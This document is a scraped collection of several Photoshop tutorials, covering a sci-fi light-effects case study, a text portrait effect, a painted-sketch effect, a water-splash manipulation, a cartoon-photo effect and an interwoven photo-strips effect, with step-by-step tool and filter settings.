Photshop Case Study 9 Step

This artwork is originally made for UUtheory NINE contest, but it's also part of the desktopography 2010 exhibition. I wanted to create something mystic and scifi. I got this idea to make a big iron nine with apocalypse scenery. I worked this with the 3D artists Sami Kuronen, who made the 3d model of the 9.

Step 1

Open the woman stock image in Photoshop and resize the height to 4000px and lock the aspect ratio to keep the proportions. I decided than in this case it’s not necessary to use the Pen Tool (P) and separate the woman from the background because in this particular case the background looks very good: well lit, it has texture and the color is OK. If you have a slow computer you can use a smaller size canvas.

Step 2

Right away I started painting the first light effects. These will work as a base to develop the rest of the effects and to establish a direction and get a stronger composition. Use a big soft brush and Color Dodge blend mode for these first light effects. See image below.

Step 3

Now you can add the first fractals. I used some great stock images I found on deviantART but you can use your own if you have or search for others. You can also include 3D renders if you like.
The blend mode that I used for the fractal images was Screen but Color Dodge also works well. If the fractals need more contrast when using the Screen mode, use Levels of Curves to increase the blacks. You can change the color of the fractals using Hue/Saturation and change the Hue. Place the fractals as shown in the image below.

Step 4

Keep adding light effects using the Brush Tool and the Color Dodge blend mode. The original idea was to create a sort of explosion of light bursting out of the woman’s chest but in the end I went for something easier. With the help of those fractal bubbles I wanted to achieve a sort of an abstract effect of the soul getting out of the woman.
To make the effect stronger I added 2 more light effects (Orange and Green) above the woman’s chest. I also added more lights on the lower part of the image using Purple and Turquoise (ocean green). See image below.

Step 5 – Shatter effect

Now I will show you how I made the shatter effect on the womans legs. I found some cool 3D render stock images from http://www.graphic-travelling.com/ and I used those. I selected one of the renders and pasted it over my image.

Next, I created a layer mask for the 3D render and I used a splatter brush to create smaller pieces and also to create some holes and let see the woman’s body through. It looks good without the layer mask too, so it’s up to you.

Once I had the 3D render ready, I duplicated the layer of the jumping woman and I placed it as a clipping mask over the 3D render and moved it around until it looked good. I also added another light here over the shatter and grouped all layers.

If you want more shatters, just duplicate the group and place it as you like. Next I added another stock image of a water trail

Step 6

I traced a path with the Pen Tool (P) and then I converted the path into a selection and using a big soft brush I painted a few lines along the outer edge of the selection to get those faded white lines.

Once you painted as shown above, change the blend mode of the layer to Overlay. I duplicated the shape, flipped it and placed it on another position. Try adding a bit of drop shadow to one of the shapes you just created and see how it looks.

Step 7

Adding the square bits is quite simple. All you need to do is select the default square brush and tweak the settings a bit. Increase the Shape Dynamics to almost 100%, set Angle Jitter to about 60%. Activate Scatter and set Count to 1 and Scatter to 1000% Both Axes. If the separation of the squares is still not enough increase Spacing to about 400%. Once your brush is set, try with different diameters and paint a few lines with white as in the image below. The blend mode used is Overlay.

Step 8

I added a few colored butterflies. Each butterfly has it’s own outer glow effect because I wanted to have even more light effects. The Blend Mode of the Outer Glow effect is Color Dodge.

Step 9

To finish I created some vector-like lines using the Polygonal Lasso tool and the Shift key in order to draw at 45º angle. Then I applied Motion Blur again at 45º angle and created those fading lines. Then I changed the blend mode to Overlay and duplicated the shape a few times.

Step 10

Now let’s go with the “post production”. In this step I took the final image (selected the entire canvas with CTRL+A and then Copy Merged from Edit>Copy Merged or with the shortcut Shift+Ctrl+C) and pasted it on a new document.
The purpose of this step is to give the image a final punch and create contrast between lights and shadows and also between the colors themselves.
After pasting the merged image on a new layer I turned it into a Smart Object (it’s optional) and then I applied my favorite light filter: Lighting Effects from Filter>Render>Lighting Effects. I used the following settings.

Last but not least I added a Gradient Map adjustment layer with Opacity 35% and Soft Light. This will affect the colors. I used the settings shown below.

Potrait Face Text with PhotoShop Cs

Written by Steve Patterson. In this Photoshop tutorial, we’ll learn how to create a text portrait effect. In other words, we’ll create the illusion that the image seen in the photo is actually being created by multiple lines of type. I’ve seen this effect used with many celebrity photos, from Andy Warhol and Marilyn Monroe to Michael Jackson, David Beckham, even Barack Obama. Of course, you don’t need a photo of someone famous to create this effect. In fact, the more you know about the person in the photo, the more interesting the effect can become because you can add more personalized text. You may want to write about what the person in the photo means to you, or share a funny story, or describe something they’ve accomplished. Or, you can just grab some random text from somewhere and paste it in. It’s completely up to you. I’ll be using Photoshop CS4 for this tutorial, but any version of Photoshop should work.

Let’s get started!

Step 1: Crop The Image Around The Person’s Face

Before we begin, I should mention that you’ll probably want to work on a copy of your photo for this effect rather than on the original image, since the first thing we’ll be doing is cropping some of it away. To save a copy of the image, go up to the File menu at the top of the screen and choose Save As. Give the document a different name, such as “text-portrait-effect” or whatever makes sense to you, and save it as a Photoshop .PSD file. This way, you can do whatever you like to the image and not worry about damaging the original.
Let’s begin by cropping the image so we get a nice close-up view of the person’s face. Photoshop’s official tool for cropping images is the Crop Tool, but for simple crops like this, you’ll often find that the Rectangular Marquee Tool is all you really need. I’m going to grab the Rectangular Marquee Tool from the top of the Tools panel (panels are called "palettes" in earlier versions of Photoshop). I could also press the letter M on my keyboard to select it with the shortcut:

The Rectangular Marquee Tool works great for simple crops.

Then, with the Rectangular Marquee Tool selected, I’ll click and drag out a selection around the man’s face, beginning in the top left and dragging towards the bottom right. If you need to reposition your selection as you’re dragging it, hold down your spacebar, drag the selection to a new location with your mouse, then release your spacebar and continue dragging out the selection. I want my selection to be a perfect square, so I’ll hold down my Shift key as I’m dragging, which will force the shape of the selection into a square. When you’re done, you should have a selection that looks something like this:

Everything outside of the selection will be cropped away in a moment.

With the selection in place, go up to the Image menu in the Menu Bar at the top of the screen and select the Crop command:

Go to Image > Crop.

As soon as you select the Crop command, Photoshop crops away everything outside of the selection outline, leaving us with our close-up portrait:

Only the area inside the selection remains.

Step 2: Add A New Blank Layer

If we look in our Layers panel (palette), we see that we currently have just one layer in our Photoshop document. This layer, named Background, is the layer that contains our image. We need to add a new blank layer above the Background layer, and we can do that by clicking on the New Layer icon at the bottom of the Layers panel:

Click on the New Layer icon in the Layers panel (palette).

Nothing will seem to have happened in the document window, but the Layers panel is now showing a new layer sitting above the Background layer. Photoshop automatically names the new layer “Layer 1″. If we look in the layer’s preview thumbnail to the left of the layer’s name, we see a gray and white checkerboard pattern. This is how Photoshop represents transparency, and since the preview window is filled with nothing but this checkerboard pattern, we know the layer is currently blank (transparent):

The preview thumbnail for each layer shows us what’s currently on the layer.

Step 3: Fill The New Layer With Black

Next, we need to fill our new layer with black. Go up to the Edit menu at the top of the screen and select the Fill command:

Select the Fill command from the Edit menu.

This brings up Photoshop’s Fill dialog box, giving us an easy way to fill a layer or a selection with either a solid color or a pattern. Since we no longer have a selection active on the layer, the entire layer will be filled with whatever color we choose. Select Black from the list to the right of the word Use in the Contents section at the top of the dialog box:

Choose Black for the fill color.

Click OK to exit out of the dialog box and Photoshop fills “Layer 1″ with black. Since “Layer 1″ is sitting above the Background layer, our image is now blocked from view in the document window by the fill color:

The photo temporarily disappears behind the solid black color.

Step 4: Select The Type Tool

We’re ready to add our text. We’ll need Photoshop’s Type Tool for that, so select it from the Tools panel, or press the letter T on your keyboard to quickly select it with the shortcut:

Any time you want to add text to a Photoshop document, you’ll need the Type Tool.

Photoshop gives us the option to add either point type or area type to our documents. Point type is your basic single line of text, usually either a heading or a short caption. Adding point type is as easy as clicking with the Type Tool at the point in the document where you want the line of text to appear and then adding your text. As long as the text you’re adding is short enough that you’re not worried about it extending out beyond the edge of the document, point type is usually the way to go.
Area type, on the other hand, is used when you have large amounts of text, say one or more paragraphs, and you need to make sure that all of the text stays within the boundaries of the document or within a certain area of the document. Since we need to fill our entire document with text, we’ll need to use area type.
To add area type, we first need to define the boundaries for the text, and we do that by dragging out a text frame, which looks very similar to the same sort of basic selection we dragged out earlier with the Rectangular Marquee Tool. Once we have the text frame in place, any text we add will be confined within the frame.
With the Type Tool selected, click in the very top left corner of the document, then drag down to the very bottom right corner of the document so that the text frame covers the entire document area when you’re done. As you drag, you’ll see the outline of your text frame appearing. Just as when dragging out a selection with the Rectangular Marquee Tool, you can reposition the text frame as you’re dragging it out if needed by holding down your spacebar, dragging the frame to a new location, then releasing your spacebar and continuing to drag. When you’re done, release your mouse button and you should see your text frame surrounding the entire document, although it may be a little difficult to see in the small screenshot:

Any text we add will now be confined within the boundaries of the document thanks to the text frame.

Step 5: Select Your Font Options In The Options Bar

Now that we have our text frame in place, we can add our text. Before we do though, we’ll need to choose which font we want to use. Any time the Type Tool is selected, the Options Bar at the top of the screen will show various options for working with text in Photoshop, including options for choosing a font, font style, font size, text color, and so on. The exact fonts you have to choose from will depend on whichever ones you currently have installed on your computer. You’ll probably need to experiment a few times with this since the font you choose, especially the font size, will have a large impact on the overall look of the effect. To preserve as much detail in the portrait as possible, you’ll want to use a small font size. Of course, the smaller the font, the more text you’ll need to add to fill up the entire document area.
I’m going to stick with something simple, like Arial Black, and I’ll choose 12 pt for my font size to keep it small enough to maintain lots of detail in the portrait:

Select your font, style and size from the Options Bar.

We’ll need our text color to be white, so if yours is currently set to some other color, click on the color swatch in the Options Bar, which will bring up Photoshop’s Color Picker, and choose white. Click OK when you’re done to exit out of the Color Picker. The color swatch in the Options Bar should now be filled with white:

Click on the color swatch in the Options Bar and select white from the Color Picker if your text color is not already set to white.

Step 6: Add Your Text To The Document

All we need to do now is to add the text. As I mentioned at the beginning of the tutorial, you can personalize the text portrait effect by writing something specific about the person in the photo, or you can simply copy and paste enough text from somewhere to fill up the document. Since I’m using a stock photo for this tutorial and I don’t actually know the person in the image (although I’m sure he’s a nice guy with lots of good stories to share), I’ll simply add some standard “lorem ipsum” page filler text. When you’re done, you’re entire document should be filled with white text:

Add enough text to fill the entire document from top to bottom.

To accept the text and exit out of text editing mode, click on the small checkmark in the Options Bar:

Click on the checkmark in the Options Bar to accept the text.

Step 7: Add A Layer Mask To The Type Layer

To turn our Photoshop document full of text into our text portrait effect, we’ll need to add a layer mask to the text layer. If we look in the Layers panel, we see that we now have three layers, with our text layer sitting above the other two layers. We know that it’s a text layer because the layer’s preview thumbnail shows a capital letter T in the center of it. To add a layer mask to the layer, click on the Layer Mask icon at the bottom of the Layers panel:

Make sure the text layer is selected (highlighted in blue) in the Layers panel, then click on the Layer Mask icon.

Nothing will happen yet in the document window, but a layer mask thumbnail will appear to the right of the layer’s preview thumbnail:

Layer masks are filled with white by default, which means everything on the layer is fully visible in the document.

Step 8: Copy The Original Photo On The Background Layer

We’re now going to create our effect by copying and pasting the portrait photo directly into the layer mask we just added. Click on the Background layer in the Layers panel to select it. You’ll see it become highlighted in blue, telling us that it’s now the currently selected layer:

Layer masks are filled with white by default, which means everything on the layer is fully visible in the document.

Press Ctrl+A (Win) / Command+A (Mac) to quickly select the entire layer. You’ll see a selection outline appear around the edges of the document, indicating that the entire layer is now selected. Even though we can still see our white text against the solid black fill color in the document window, we’re actually selecting the contents of the Background layer because that’s the layer we currently have selected in the Layers panel. Then, press Ctrl+C (Win) / Command+C (Mac) to copy the contents of the layer (the portrait photo) temporarily into your computer’s memory.

Step 9: Paste The Photo Directly Into The Layer Mask

Hold down your Alt (Win) / Option (Mac) key and click on the layer mask thumbnail on the text layer in the Layers panel:

Click on the layer mask thumbnail while holding down Alt (Win) / Option (Mac).

By holding down Alt / Option as we click on the layer mask thumbnail, not only do we select the layer mask, we make it visible inside the document window, allowing us to paste our image directly into it. Since the mask is currently filled with white, your document window will appear filled with white. Press Ctrl+V (Win) / Command+V (Mac) to paste the portrait photo directly into the layer mask. Since layer masks deal only with black, white and shades of gray, the image will appear as a black and white image in the document window:

The image has now been pasted directly into the layer mask on the text layer.

To exit out of the layer mask and switch our view back to normal in the document window, simply hold down Alt (Win) / Option (Mac) once again and click on the layer mask thumbnail, just as we did a moment ago. Notice that the portrait photo is now visible inside the layer mask thumbnail:

Hold down Alt (Win) / Option (Mac) and click again on the layer mask thumbnail to exit out of the layer mask.

Press Ctrl+D (Win) / Command+D (Mac) to remove the selection outline from around the edges of the document window. We’re now back to our normal view mode inside the document, and the text is now being masked by the photo that we pasted directly into the layer mask, creating our “text portrait” effect:

The text is now being masked by the photo.

Step 10: Duplicate The Type Layer

If you’re happy with the results at this point, you can skip these last couple of steps, but if you find that the effect looks a little too dark, make sure the text layer is selected in the Layers panel, then press Ctrl+J (Win) / Command+J (Mac) to quickly duplicate the layer. A copy of the text layer will appear above the original:

You can also copy layers by going up to the Layer menu, choosing New, then choosing Layer via Copy, but the keyboard shortcut is much faster.

The image will now appear brighter:

The effect appears brighter after duplicating the text layer.

Step 11: Adjust The Layer Opacity To Fine Tune The Brightness

If you find that the effect is still too dark, simply duplicate the text layer a second time. Or, if you find that it’s now a bit too bright, you can fine tune the results by lowering the layer’s opacity. You’ll find the Opacity option at the top of the Layers panel. The lower you set the opacity of the top layer, the more you allow the layers below it to show through, which in this case will have the effect of darkening the image. I’m going to lower the opacity of my copied text layer down to around 65% just to darken the effect slightly:

Reduce the top layer’s opacity to fine tune the brightness of the effect.

And with that, we’re done! Here, after adjusting the brightness with the Opacity option, is my final “text portrait” Photoshop effect:

Create a Painting Effect – Photoshop Tutorial

Want to inject a little uniqueness in your ordinary portrait photo? In today’s Photoshop tutorial, we show you how to touch up your photo, giving it some painting and sketching effect as shown in image below.

The steps are pretty simple and straight-forward. Before we get started, we’re going to need a few things. We recommend that you download them before going into the tutorial.

Let’s get started!

Step 1

Start by creating a new canvas of 600×400 (or any sizes you think fit) in Photoshop. Create a new layer, call it "Layer 1" and place the photo we downloaded earlier inside.

Step 2

In this step, we’ll first turn it ito a black and white photo. You can use any technique, but we are going to make use of the Hue/Saturation.
Look for Hue/Saturation under Adjustments palette (Windows > Adjustment). Decrease its Saturation value to -100. A "Hue/Saturation 1" layer will then be added to your Layers palette.

With "Layer 1" selected, find and add Color Balance under Adjustments palette. A "Color Balance 1" layer will then be added to your Layers palette.
Under the Color Balance’s Adjustment palette, switch Tone to Shadows and the following values:

Cyan/Red: -59
Magenta/Green: -100
Yellow/Blue: -92

Then switch Tone to Highlights, and enter the following values:

Cyan/Red: -5
Magenta/Green: -1
Yellow/Blue: -50

Your temporarily result will look something like the image below. Let’s go ahead and merge all the layers. To do that, we’ll first select all 3 layers "Hue/Saturation 1", "Color Balance 1" and "Layer 1" and then we hit Control + E (or Layers > Merge Down).
Let’s call our new marged layer "Girl"

Step 3

Create a new layer with command Ctrl + Shift + N, fill it with white color with command Ctrl + Backspace. Move it bottom so it stays below the "Girl layer"
Double click "Girl" layer to bring up the Layer Style dialog. Under the Blend If: section, look for the white triangular of This Layer:, hold the Alt key, and drag the white triangular towards the left until you reach the number 191/255.

After that, merge all layers with command Ctrl + E. Make sure our layer’s name is still "Girl"

Step 4

Hit Ctrl + Shift + N to create a new layer under "Girl" layer, fill it up with white color with command Ctrl + Backspace. Make sure the "Girl" layer is selected, hit Ctrl + J seven times to create seven new copies. Turn all Girl copy X layers off by clicking on the eye icon on the left of Layers palette.
This leaves us with the original "Girl" layer. With it selected, do a Motion Blur (Filter > Blue > Motion Blur) the follwing values for:

Angle: -22
Distance: 484.

Next, let’s add some Watercolor effect (Filter > Artistic > Watercolor) and set the following values for:

Brush Details: 1
Shadow Intensity: 0
Texture: 3

Hit OK, and set the layer’s Opacity to 60% and name it "Wet Brush 1".

Step 5

Moving up the Layers palette, look for the "Girl Copy", click on its eye icon to make it visible. Apply Motion Blur (Filter > Blur > Motion Blur) with the following values:

Angle: 22
Distance: 247

Then we add Watercolor (Filter > Artistic > Watercolor) like we did in Step 4. No change to Watercolor settings, hit OK when done. With the layer selected, set its Opacity to 85%.
Now, let’s give it a little hand-sketching feel. With "Girl Copy" later still selected, go into transformation mode with command Ctrl + T. Rotate it 90 degree CW, hit Enter/Return to confirm its transformation.
Give it a little Sheer effect (Filter > Distort > Shear) as showned in the image below, and then rotate it back to 90 degree CCW.

Hit Ctrl + T again to go into transformation mode. Move it back to fit the canvas, and decrease its height for about 40%.

With "Girl Copy" layer still selected, click Add Layer Mask button at the bottom of Layers palette to give it a mask layer. Select the Gradient Tool with the command G, and give the mask layer a gradient of white (top) and black (bottom).

Now, you may notice some hard edges and we are going to clean it up. Select Brush Tool with the command B with the following values:

Size: 150px
Hardness: 0%
Opacity: 30%

Paint on the hard edges and corners repeatly to smoothen things up.

Step 6

Select "Girl Copy 2" layer, click the eye icon to make it visible. Get Sprayed Strokes (Filter > Brush Stroke > Sprayed Strokes) and set the following values:

Stroke Length: 20
Spray Radius: 20
Stoke Direction: Right Diagonal

We proceed to getting some Angled Strokes (Filter > Brush Stroke > Angled Strokes) and give it the following values:

Direction Balance: 100
Stroke Length: 50
Sharpness: 10

Set the Opacity of this layer to 70% and double click it to bring up the Layer Style dialog. Under Blend if: section, hold Alt key and drag white triangular towards the left until you see the number 144/221.
Click OK to return to the canvas, select Gaussian Blur (Filter > Blur > Gaussian Blur) and give it a Radius value of 0.8px. Name this later "Dark Strokes" and set its blending mode to Hard light.

Step 7

Select "Girl Copy 3" layer, click eye icon making visible. Give it a Crosshatch (Filter > Brush Stokes > Crosshatch) with the following values:

Stroke Lenght: 50
Sharpness: 14
Strength: 3

Then, give it Gaussian Blur (Filter > Blur > Gaussian Blur) of 0.4px. Set the layer’s Blending mode to Multiply, and lastly, name the layer "Crosshatch"

Step 8

Yeap, you guessed it. Open up "Girl copy 4". Change its layer Opacity to 85%. Now, with "Girl copy 4" selected, hold the Alt key and click Add layer mask on the bottom of Layers palette. This allows us to add layer mask but hiding it at the same time.
Get the Brush tool with the command B, and select the following values:

Size: 150px
Hardness: 0%
Opacity: 20%

Make sure the foreground color is white, start painting repeatedly on the face and body and to reveal them. Focus on main parts like eyes, lops and nose. Use White color to reveal parts you want to show, and Black to hide them. Our aim here is to maintain artistic and sketching effect; make it looks dirty, but not too dirty. You get the drift.

Once you are happy with the result, we fall back to "Crosshatch" layer. Select the layer, hold the Alt key and add a Layer mask. Do the same as you previously did – paint it with Black and/or White brush until you get similar result like the image below.

Step 9

Next, we go to "Girls copy 5" layer. Double click the layer to bring up Layer Style dialog, change Blend Mode to Color Burn.
Again with the later selected, hold the Alt key and click Add layer mask button. Our aim here is to make the face and body darker so we grab the Brush tool with command B and repeately painting on those parts until you get result like the image below.

Step 10

Now we want to add some edges on it. Select the "Girl copy 6" layer, click on its eye icon to make it visible.
Look for filter effect Glowing Edges (Filter > Stylize > Glowing Edges), set the following values:

Edge Width: 1
Edge Brightness: 20
Smoothness: 10

Click OK, then hit command Ctrl + I to invert it. Set the image’s Brightness/Contrast (Image > adjustments > Brightness/Contrast) to:

Brightness: 150
Contrast: 100

Set the layer’s Blending Mode to Multiply and Opacity 75%. Again, like our previous steps, hit Layer mask button while holding Alt key. Get the Brush B tool, paint gently on the image to reveal some smooth edges.
Name this layer "Edges".

Step 11

Moving on, turn on "Girl Copy 7" layer. Our goal here is to get some wet brush the shoulder, we’ll do something similar to what we did in Step 5.
Call up Motion Blur (Filter > Blur Motion Blur), set the following values:

Angle: 0
Distance: 600px

Give it Watercolor (Filter > Artistic > Watercolor), hit OK with default settings. Then we bend it with Shear effect (Filter > Distort > Sheer). Use command Ctrl + T to go into Tranformation mode, rotate the image a little to the left (or right) and hit OK.
Hold Alt key and click Add Layer mask, and paint some White Color with Brush B tool over the shoulder.

Step 12

Now we’d like to enhance the texture effect for this art. Download Paper texture v5 by Bashcorpo, pull it inside our working PSD file and fit it on top of our layer. Hit Ctrl + Shift + U to Desaturate it, and change the layer’s Blending Mode to Darker Color.
Now, because the texture image is actually bigger than our image, you can move it around to see which part of the texture fits best.

Step 13

It’d will be nice to give the image some Sin City effect. Let’s go ahead and add some red color for the glasses. To do it, go to Adjustments palette (Windows > Adjustments) and click on the Hue/Saturation button. A "Hue/Saturation 1" layer will then be created. Check the Colorize checkbox, and the following values:

Hue: 0
Saturation: 20
Lightness: 0

Select the Layer mask, and hit command Ctrl + I to hide all the reds. To reveal the red color over the glasses. let’s use a standard soft round Brush B with the following settings:

Size: 80px
Opacity: 30%.

Repeat clicking on the center of the glasses to get feather effect, like what’s shown in the image below.

Step 14

We are almost done! Now if you are unsatisfied with any of the effects, feel free to go down each of the layers and give it some final touch-ups with Brush B tool. Remember, White’s to reveal, Black’s to hide.

In this tutorial, I will show you the steps I took to Create Epic Splashing Human Photo Manipulation in Photoshop. The main focus of this tutorial is the use of layer masking techniques, photo retouch and a few filter effects. Have a try!
This is an intermediate tutorial so some steps can be tricky – if you’re having difficulty with it, I suggest you go to the basic section of PSD Vault and practice those tutorials first, then come back and do this one.

Ok Let’s get started!
To complete this tutorial, you will need the following stock:
Model – by mjranum-stock
Water Texture

Step 1

Create a document (size doesn’t really matter here) with black background, load the model image into Photoshop and cut out the model, paste it on the center of our canvas:

We can remove some dark spots on the leg with spots healing tool:

Adjust the brush tip size to around the size of the dark spot, then left-click to remove it:

and you will see the spots disappear after the healing:

Make sure you clean up the edge with a soft eraser:

Add the following 2 adjustment layer to the model layer as clipping mask:
Black and White

Levels

Layer mask on the Levels adjustment layer:

and you will have the following effect:

Step 2

We can add some cloud to act as background lighting to the model – you can use a cloud brush or the cloud filter to achieve this effect: (use Free Transform to adjust its size)

Also add some cloud behind the guitar for more effect:

Compress the cloud layer down the move it to the bottom:

Use a soft black brush to paint some shadow under the feet, make sure you following the shape of the model’ feet for best result:

Step 3

Now we can add some water texture. Load the water texture and use Quick Selection Tool to select a portion:

Copy and paste the selection onto our canvas and warp it a little as shown below:

Apply the following black and white adjustment to this texture:

Then apply the following Levels adjustment to this layer:

and you will have the following effect:

Use the Sharpen Filter to sharpen this texture a bit:

Duplicate this layer a few times and scatter them around the model:

Step 4

Draw a ring behind the model with Elliptical Marquee Tool, erase some parts with a soft eraser to create some breaking effect:

Repeat the steps described in previous step, apply some water texture on the ring, use the Warp Tool to adjust the shape when necessary:

Keep going until the water stream texture cover the entire ring:

You can also put some water stream texture above the model layer to create some overlay effect:

Step 5

We can some more water pattern to the image. Go back to the Water Texture and select a portion with a 30px feather Lasso Tool:

Copy and paste the selection onto our canvas, move it to the top and apply the following black and white adjustment to it:

And you will have the following effect:

Duplicate this water layer once and move it to the bottom, use the Warp Tool to warp it as shown below:

We want to splash to appear behind the model, so use a soft eraser to remove the front portion”

and here is the effect so far:

Step 6

We can now add some abstract flying pattern to the image. I decided to create a custom brush for this purpose. Firstly we can create a new document sized 150px * 150px, create a new layer and paint a dot in the centre with a soft black brush:

Use the Warp Tool to warp it as shown below:

Then bring up the Liquify Filter, set the brush as below:

Use Forward Warp option to liquify it to this following shape:

Make sure you turn off the background layer, Hit “Ctrl + A” to selection all, then go to “Edit > Define Brush Preset”:

After defining the brush, press F5 to bring the brush option window, apply the following settings:

Tick “Airbrush”, “Smoothing” and “Protect Texture” options. Use this brush to paint some patterns as shown below on the image:

Step 7

We’re almost done. For some final retouches we can use the Sharpen Tool from the Toolbox to sharpen a number of areas on the model: (flatten the image first)

Hint: set the strength of the sharpen tool to around 30-40%. Don’t over-sharpen the image.

Duplicate this layer and apply the following Accented Edges filter to it:

We don’t want the whole image to have this filter effect, so add the following layer mask to hide centain portion:

and you will have the following effect:

Now you can add a few colours for this image, you can do it via several methods:

Colour balance adjustment layer with mask
Paint with a soft brush on a new layer (set blending mode to “overlay”, “soft light” or “color”)
Play with Channels

You can experiment with the aboves and see what result that brings you.

Hi guys, how are you today? I'm sure you're OK :) but I think some of you have a bad day today, but not problem, today I will give a tutorial Photoshop "How to Make Cartoon Photo with Photoshop Cs"

first thing you need is a photo with best pixeled and Adobe Photoshop Cs version.

Open your Adobe Photoshop Cs. Then create a new layer with resolution 2690x1900 pixels and open the photo that you make cartoon, and copy the photo layer to your new layer.
Next, you need to make some blur to your photo layer, but don't forget to copy that layer before, in photo layer choose the Filter Effect (Filter-Artistic-Poster Edges), Poster edges you can make your own desain or make like on the photo below 9 for fisrt colom, 1 for second colom and 6 for the last and press enter.
ok, now we get photo with a black line, for the next step back to Filter (Filter-Artistic-Cutout) for the setting we will need to change the Number of Levels to 5,Edge Simplicity to 0, and for Edge Fidelity to 1 and we get photo like the photo below

Photoshop Tutorial Strip Photoes

Step 1: Crop The Image Into A Square

The first thing we need to do for this effect is crop the image into a square, although technically you could leave the image as a 4x6 or whatever size it happens to be, but the effect tends to look best as a square, so let's crop it. We'll use Photoshop's Crop Tool for this, so select it from the Tools palette:

Select the Crop Tool.

You could also press the letter C to quickly select it with the keyboard shortcut. Then, with the Crop Tool selected, hold down your Shift key and drag a selection around the person's face. Holding Shift tells Photoshop to constrain the selection to a perfect square:

Hold down "Shift" and drag a square selection around the person's face.

Press Enter (Win) / Return (Mac) when you're done dragging out the selection, and Photoshop goes ahead and crops the image into a square:

The image is now cropped into a square.

Step 2: Duplicate The Background Layer Twice

The next thing we're going to do is create a couple of copies of our image. If we look in the Layers palette, we can see that we currently have one layer which is named Background and it contains our original image (or at least, what's left of our original image now that we've cropped it). We need to duplicate the Background layer a couple of times, so use the keyboard shortcut Ctrl+J (Win) / Command+J (Mac) to duplicate it once and then use the same keyboard shortcut again to create a second copy. You should see three layers now in your Layers palette. Double-click directly on the name of the layer on top and rename it "Vertical Strips", then double-click directly on the name of the layer below it and rename it "Horizontal Strips":

Press "Ctrl+J" (Win) / "Command+J" (Mac) to create two copies of the Background layer, then rename the top one "Vertical strips" and the bottom one "Horizontal strips".

Step 3: Fill The Background Layer With Black

Press D on your keyboard to reset Photoshop's Foreground and Background colors to their defaults of black as the Foreground color and white as the Background color (yours may already be set the default colors). Then click on the original Background layer (the bottom layer) in the Layers palette to select it. We're going to fill it with black, and with black now as our Foreground color, we can use the keyboard shortcut Alt+Backspace (Win) / Option+Delete (Mac) which fills the currently selected layer with the current Foreground color (black). Nothing will seem to have happened to the image, since the two layers above the Background layer are blocking it from view, but if we look in the Layers palette, we can see that the Background layer's thumbnail is now filled with black, telling us that the layer itself is filled with black:

Select the Background layer in the Layers palette and press "Alt+Backspace" (Win) / "Option+Delete" (Mac) to fill it with black.

Step 4: Turn The Top Layer Off For Now

We're going to create our horizontal strips first, but the "Vertical Strips" layer on top is going to block our view so we need to temporarily turn it off. To do that, click on the layer visibility icon (the "eyeball" icon) to the left of the "Vertical Strips" layer in the Layers palette. You won't see anything happen to the image itself since the "Vertical Strips" and "Horizontal Strips" layers are identical at the moment, but when you click the eyeball icon, the eyeball will disappear, letting you know that the layer is now hidden:

Click on the "eyeball" icon to the left of the "Vertical Strips" layer in the Layers palette to temporarily turn the layer off.

Step 5: Turn On Photoshop's Grid

We're going to create our vertical and horizontal strips, and to help us out, we'll use Photoshop's grid. Go up to the View menu at the top of the screen, choose Show, and then choose Grid. You can also use the keyboard shortcut Ctrl+' (Win) / Command+' (Mac) to easily turn the grid on and off. When your grid appears, if you find that you can't see it very well because the grid color is blending in with the colors of your image, press Ctrl+K (Win) / Command+K (Mac) to quickly bring up Photoshop's Preferences. Then, from the drop-down menu at the top, choose Guides, Grid and Slices. From here, we can change the color of the grid. In the Grid options, click on the color swatch in the top right corner, which will bring up Photoshop's Color Picker. Select a color for your grid that you'll be able to see in front of your image and then click OK to exit out of the Color Picker. You can see in the screenshot below of the Grid options that I've changed my grid color to yellow:

Change the color of the grid in Photoshop's Preferences if needed.

Click OK to exit out of the Preferences dialog box. You should now see your grid in your new color (in my case yellow) over top of your image:

Step 6: Drag Out A Series Of Horizontal Selections

Let's create our horizontal strips first. Grab your Rectangular Marquee Tool from the Tools palette, or press M on your keyboard to quickly select it:

Now let's use our grid to help us create our horizontal strips. First, make sure the "Horizontal Strips" layer is selected in the Layers palette (the currently selected layer is highlighted in blue). I'm going to create horizontal strips that are two grid rows high, with one grid row separating them from each other. Now, I want to make sure that the woman's eyes are included in the final effect, so I'm going to start by dragging out a selection around the two grid rows in front of her eyes. By default, my selection will snap to the grid as I'm dragging to make things easy. If you find that your selection is not snapping to the grid, go up to the View menu at the top of the screen, choose Snap To, and then choose Grid. You should see a checkmark to the left of the word "Grid".
Here's my selection around the two grid rows in front of her eyes:

Drag out a horizontal selection two grid rows high.

This selection will become one of our horizontal strips. Now let's create the rest of them. Hold down your Shift key, which will tell Photoshop to add these next selections to our original selection, and drag out more horizontal selections, keeping each one two grid rows high and leaving one grid row separating each selection. Your image should look like this when you're done:

Hold down "Shift" and drag out the rest of the horizontal selections, making each one two grid rows high and leaving one grid row between them.

Step 7: Add A Layer Mask

With our horizontal selections in place, click on the Layer Mask icon at the bottom of the Layers palette to add a layer mask to the "Horizontal Strips" layer:

Click on the "Layer Mask" icon at the bottom of the Layers palette.

Photoshop adds a mask to the layer and uses the selections we've created to determine which parts of the layer will remain visible and which parts will become hidden from view. The areas that were inside our horizontal selections remain visible, while the areas that were in the grid columns that separated our selections disappear, revealing the black-filled layer underneath:

After adding the layer mask, Photoshop hides the areas between our selections, revealing the black-filled layer underneath.

I'm going to press Ctrl+'(Win) / Command+' (Mac) to temporarily hide my grid so we can see more clearly what's happened. We've now created our horizontal strips:

The horizontal strips are now created.

Step 8: Turn The "Vertical Strips" Layer Back On

We're going to do the same thing now to create our vertical strips. First, click on the top "Vertical Strips" layer in the Layers palette to select it, then click back on its layer visibility icon to bring back the eyeball and turn the layer itself back on:

Select the "Vertical Strips" layer in the Layers palette and click once again on its layer visibility icon to turn the layer back on.

Step 9: Drag Out A Series Of Vertical Selections

Just as we did when creating the horizontal strips, let's drag out a series of selections, this time vertical ones. We'll make the vertical selections two grid columns wide, leaving one grid column between them. Use your Rectangular Marquee Tool to drag out your first selection, then hold down Shift and drag out the rest of your selections. Your image should now look like this:

Drag out a series of vertical selections. Make them two grid columns wide and leave one grid column between each selection to separate them.

Step 10: Add A Layer Mask

With our vertical selections in place, click on the Layer Mask icon at the bottom of the Layers palette:

Add a layer mask to the "Vertical Strips" layer.

Photoshop adds a layer mask to the layer and just as before, it uses our selections to determine which areas of the layer remain visible and which ones disappear from view. The areas inside our selections remain visible, and the areas that were inside the grid columns separating our selections disappear revealing both the "Horizontal Strips" layer and the black-filled layer below:

Only the areas that were inside our vertical selections remain visible.

